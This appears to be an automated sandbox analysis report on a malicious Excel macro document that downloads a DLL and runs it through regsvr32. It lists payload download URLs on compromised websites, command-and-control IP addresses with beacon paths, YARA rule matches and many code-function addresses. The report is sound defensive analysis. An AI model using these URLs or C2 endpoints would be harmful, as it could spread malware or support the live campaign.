                        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 16 Nov 2022 04:43:21 GMTServer: ApacheContent-Length: 380Keep-Alive: timeout=5, max=500Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: 4DF60000.0.drString found in binary or memory: http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                        Source: 4DF60000.0.drString found in binary or memory: http://www.cecambrils.cat/wp-content/cXEhHssszV/
                        Source: 4DF60000.0.drString found in binary or memory: http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: 4DF60000.0.drString found in binary or memory: http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/
                        Source: regsvr32.exe, 00000006.00000003.1002662490.0000000000381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000003.1150324980.0000000000271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000003.1015548706.0000000000379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000003.1163475701.0000000000270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000003.1034450302.000000000037C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1193565866.000000000037C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000002.1193461003.000000000026E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: unknownHTTP traffic detected: POST /kwxkonang/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 357Host: 218.38.121.17
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to behavior
                        Source: unknownDNS traffic detected: queries for: hsweixintp.com

                        E-Banking Fraud

                        Source: Yara match | File source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 11.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.1193467860.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                        System Summary

                        Source: Untitled-09112022.xls | Macro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\elv1.ooocccxxx
                        Source: Untitled-09112022.xls | Initial sample: EXEC
                        Source: Untitled-09112022.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Users\user\Desktop\Untitled-09112022.xls, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Users\user\Desktop\4DF60000, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\FgEHLIiiJRN\
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180044C30
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180031018
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800391F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180020204
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001F22C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018003D23C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180029290
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180024460
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001F4B0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800204D0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018003459C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018003B5A0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800305F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180017604
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001F74C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180032824
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180037854
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018002B890
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018000A93C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018003A9A0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001F9B4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180026A0C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180028B30
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001FC30
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180031C3C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018003AE50
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018001FF10
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180032F94
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_002B0000
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02020310
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020138A5
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020348E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201B1E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02019E38
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02030454
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02038C94
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02015DB4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02014DDC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02038A04
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202FA08
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011A1C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201BA24
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02031A2C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02029230
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02022244
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02012A7C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202827C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02032A84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02019298
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202629C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0203629C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201EAC4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02017AF0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202B2F0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02025B18
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02035B28
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202D32C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02025334
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02037348
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02014B4C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011B5C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02016B5C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011364
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201C364
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201E368
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201CB88
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202FB88
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02023B88
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02032B8C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201F3E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02013BE8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02019BEC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02027BF8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020273F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011000
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201E828
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02012834
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0203005C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201D864
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02016880
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202308C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202B898
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02034098
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020210AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020248B0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020178B6
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201B8D0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020138DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020298DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02022110
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02039124
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02012128
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02030930
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02019144
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02020954
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201F174
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202C974
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02027198
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020259A0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201D1AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020169C0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201D1C6
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201A1D4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020179D8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202C1DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020299E8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020199EC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202E614
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201BE34
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02016650
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202AE50
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011660
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02021664
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201C676
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201CE7E
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02034680
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201AE84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02038690
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02017694
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02025694
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02023698
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201569C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02037EA4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020196B8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02028ECC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201E708
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201871C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02031728
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202CF30
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201A734
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201FF64
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202E76C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02028778
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02022780
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02018FA0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02024FA4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020297AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020347B0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020357B4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02023FE0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02025400
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02033C0C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201741C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02024C48
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02026464
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02015478
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0203748C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201C498
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02014CA0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201D4B2
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02011CCC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020184F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_020364F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201BD00
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02025508
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02028D0C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202B520
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02019D24
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02023524
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02033D28
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202F550
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02030D54
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02028560
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02039568
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201E570
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02035D84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02015590
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02021DAC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00130000
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00219E38
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022FA08
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00212A7C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00232CBC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021DA80
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00225694
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002348E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002138DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00220310
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022D718
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022E76C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00219144
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00215DB4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002357B4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021B1E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00213BE8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002273F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00214DDC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021BA24
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021E828
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00231A2C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00229230
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021BE34
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00212834
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211000
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00225400
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00238A04
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00233C0C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022E614
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211A1C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021741C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211660
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021D864
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00226464
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00221664
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00215478
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022827C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00222244
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00224C48
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00216650
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022AE50
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00230454
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021C659
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0023005C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00214CA0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00237EA4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002210AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002248B0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021D4B2
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002178B6
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002196B8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00216880
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00234680
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021AE84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00232A84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022308C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0023748C
